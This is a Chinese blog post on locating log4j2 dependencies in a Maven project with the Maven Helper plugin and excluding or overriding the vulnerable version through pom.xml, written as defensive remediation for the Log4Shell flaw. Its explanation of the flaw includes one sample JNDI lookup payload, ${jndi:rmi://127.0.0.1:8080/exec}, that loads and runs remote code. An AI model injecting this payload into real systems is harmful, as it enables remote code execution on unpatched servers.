Maven项目如何查看哪里依赖了log4j2

最新推荐文章于 2024-07-20 07:00:00 发布
最新推荐文章于 2024-07-20 07:00:00 发布
阅读量2.2k 收藏 8
点赞数 1
分类专栏: 奇淫技巧 文章标签: maven java 安全 log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj12138/article/details/122368657
版权

Maven项目如何查看哪里依赖了log4j2

log4j2的漏洞想必大佬们都知晓了吧,由于它能解析$表达式并执行,比如${java:os}。所以有人就有坏点子了,结合jndi远程调用一个攻击服务器的java对象文件并执行,比如${jndi:rmi://127.0.0.1:8080/exec},假设被攻击的主机或者主机上运行的web程序自身没有限制调用该地址,那后果可想而知。

说来也是搞笑,这个漏洞其实很简单,也显而易见,可是log4j在业界的使用量这么大,居然这么多年才被发现。

进入正题,假设我们的maven项目是手动引用了log4j,那这个比较简单,直接修改版本,但是不能保证框架中是否也依赖了log4j,这时候就需要分析依赖了。

安装Maven Helper

在idea的插件市场搜索Maven Helper关键字,找到Maven Helper并安装

在这里插入图片描述

检查log4j

安装了Maven Helper以后,打开pom文件,左下角出现依赖器分析栏目

在这里插入图片描述

此时使用log4j关键字检索就能清楚的看到哪里依赖了log4j

在这里插入图片描述

然后在pom文件中使用exclusions节点排除,并添加新版本的log4j依赖。比如:

    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-log4j2</artifactId>
        <exclusions>
            <exclusion>
                <groupId>org.apache.logging.log4j</groupId>
                <artifactId>log4j-core</artifactId>
            </exclusion>
        </exclusions>
    </dependency>

值得注意的是如果你是多模块项目,那你只需要在父pom中使用dependencyManagement节点配置新版本的依赖,这样可以覆盖所有的子项目,不用每个子项目都排除一遍比如:

	<dependencyManagement>
        <dependencies>
            <dependency>
                <groupId>org.apache.logging.log4j</groupId>
                <artifactId>log4j-core</artifactId>
                <version>${log4j.version}</version>
            </dependency>
        </dependencies>
    </dependencyManagement>
分享到这里就结束了,欢迎大家讨论指正。
野猪佩奇ii
关注
专栏目录
Log4j 2 与SLF4J 整合 maven 依赖
qq_38163561的博客
04-25 1291
标题 <dependency> <groupId>org.slf4j</groupId> <artifactId>slf4j-api</artifactId> <version>1.7.30</version> </dependency> <dependency> <groupId>org.apache.logging.log4j</groupI
log4jmaven项目中的使用
热门推荐
slow_sparrow的博客
03-15 1万+
log4jmaven项目中的使用log4jmaven项目中的使用一、序言二、log4jmaven中的使用1.导入依赖2.配置log4j方法一:创建log4j.properties方法二:通过XML文件配置方法三:使用Java代码配置3.使用log4j log4jmaven项目中的使用 一、序言 最近在学习MyBatis,在学习过程中需要用到控制台输出sql信息,因此才会有本文。 因本文大部分都是来源于对各文章的总结,也不好说是转载某一人,因此,会有文末的参考。 如非要说侵犯版权,请告知,会及时删除。
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
12-16
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
spring-boot-starter-log4j2
09-25
此资源包含spring-boot-starter-log4j2日志框架所需的jar包及版本,童叟无欺,真实有效,放心下载
Log4j2原理及应用详解(十一)
最新发布
凛鼕将至的博客
07-20 1002
随着Logback的兴起,Log4j开始式微。为了应对这一挑战,Apache软件基金会决定开发Log4j的继任者——Log4j2Log4j2不仅改进了Log4j的缺点,还借鉴了Logback的许多优点,号称在性能上完胜Logback。 本文将跟随《Log4j2原理及应用详解(十)》的进度,继续介绍Log4j2。希望通过本系列文章的学习,您将能够更好地理解Log4j2的内部工作原理,掌握Log4j2的使用技巧,以及通过合理的设计完成最佳实践,充分发挥优化Log4j2的潜力,为系统的高效运
spring-boot-starter-log4j2漏洞修复方式
dhj8933的博客
12-14 4119
spring-boot-starter-log4j2漏洞修复方式
log4j2.xml配置文件不生效
hey_wei_ran的博客
03-18 975
log4j2.xml配置文件不生效
IDEAjava项目中使用log4j,配置文件log4j2-test.xml不生效
李闪闪
10-03 4530
1、log4j2-test.xml配置看官网:Log4j – Configuring Log4j 2https://logging.apache.org/log4j/2.x/manual/configuration.html 2、问题:控制台输出日志信息,修改level的的值不生效,仍是只能输出error以上级别的信息 <?xml version="1.0" encoding="UTF-8"?> <Configuration status="warn"> <Appen
Log4j2.xml不生效:WARN StatusLogger Multiple logging implementations found:
听香水榭
11-24 1606
处理log4j2.xml不生效问题
maven+springmvc+mybatis+log4j框架搭建
02-12
2. **配置Maven**:在`pom.xml`中添加依赖,包括SpringMVC、MyBatis、Log4j以及数据库驱动等。 3. **配置SpringMVC**:在`web.xml`中配置DispatcherServlet和ContextLoaderListener,然后在Spring的配置文件中声明...
扫描log4j2 版本扫描log4j2 版本
12-16
2. **版本确认**:然后,通过查看项目配置文件(如`log4j2.xml`或`log4j2.json`)或依赖管理工具(如Maven或Gradle)的配置,确定当前使用的Log4j2版本。 3. **漏洞评估**:对比已知受影响的版本列表,如CVE-2021-...
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
weixin_44047654的博客
12-13 1817
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
Log4j 漏洞修复和临时补救方法
12-14 3793
1.2 漏洞评级及影响版本 Apache Log4j 远程代码执行漏洞 严重 影响的版本范围:Apache Log4j 2.x <= 2.14.1 2.log4j2 漏洞简单演示 创建maven工程 引入jar包依赖 <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifa
logback替换log4j
weixin_30810583的博客
01-11 267
1.新建logback.xml放在src目录下(放在src下会自动加载,不需要再web.xml配置) 2.引入必要的jar包; 转载于:https://www.cnblogs.com/chafe/p/6274322.html
解决log4j2配置文件失效的问题
Parker的博客
07-19 1万+
今天运行项目的时候,查看控制台突然发现日志的输出格式变了,但最近又没动过log4j的配置文件,所以非常的困惑。 最后怀疑是加载了别的地方的配置文件或者因为某些原因使用了默认的配置属性。 后来在网上发现很多相类似的问题,其中大多数原因都是因为包冲突或包里含有额外的配置文件等造成的。 由此我也怀疑是最近新增加的activemq-all包而引发的问题。 于是在Tomcat的VM参数里添加-Dlo...
Log4j漏洞修复
培根芝士的专栏
12-30 2093
Apache Log4j是一个功能强大的日志组件,提供方便的日志记录。 12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。 此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 简单来说,就是在打印日志时,如果发现日志内
Apache Log4j 漏洞修复
weixin_43354218的博客
12-19 603
Log4j 漏洞修复 文章目录Log4j 漏洞修复1、漏洞介绍2、漏洞修复2.1 1.升级Log4j版本2.2 配置启动参数 1、漏洞介绍 Apache Log4j2 是一款优秀的 Java 日志框架,Log4j 2.x – 2.14.0 版本 Lookup 基于 JNDI(Java Naming and Directory Interface),而 JNDI 支持 RMI ( Remote Method Invocation )。这导致在打印用户输入特定文本时可能远程调用任意代码在本地执行。 2、漏洞
【漏洞修复】Apache Log4j 远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046)
m0_52985087的博客
01-23 1181
本文档适用于OpenEuler20、OpenEuler21、OpenEuler22、麒麟V10 SP3、统信V10操作系统,修复Log4漏洞。
springboot log4j升级log4j2
Mint6的博客
05-13 1617
log4j2升级步骤 在多线程情况下,使用log4j可能会阻塞其他线程,从而导致整体性能下降并出现性能瓶颈。所以需要升级到性能更好并支持异步的log4j2
java maven 项目中引入 log4j
05-11
要在 Java Maven 项目中引入 log4j,需要按照以下步骤进行操作: 1. 在项目的 pom.xml 文件中,添加 log4j依赖: ```xml <dependency> <groupId>log4j</groupId> <artifactId>log4j</artifactId> <version>1.2.17</version> </dependency> ``` 2. 在项目中,创建一个名为 log4j.properties 的配置文件。该文件用于配置 log4j 的行为。以下是一个示例配置: ```properties log4j.rootLogger=DEBUG, stdout log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.Target=System.out log4j.appender.stdout.layout=org.apache.log4j.PatternLayout log4j.appender.stdout.layout.ConversionPattern=%d{yyyy-MM-dd HH:mm:ss} %-5p [%c:%L] - %m%n ``` 3. 在代码中,通过以下方式获取 log4j 的 Logger 对象: ```java import org.apache.log4j.Logger; public class MyClass { private static final Logger logger = Logger.getLogger(MyClass.class); // ... } ``` 4. 在代码中,使用 logger 对象记录日志: ```java logger.debug("Debug level log message"); logger.info("Info level log message"); logger.warn("Warning level log message"); logger.error("Error level log message"); logger.fatal("Fatal level log message"); ``` 以上步骤完成后,log4j 就已经被成功地集成到 Java Maven 项目中了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值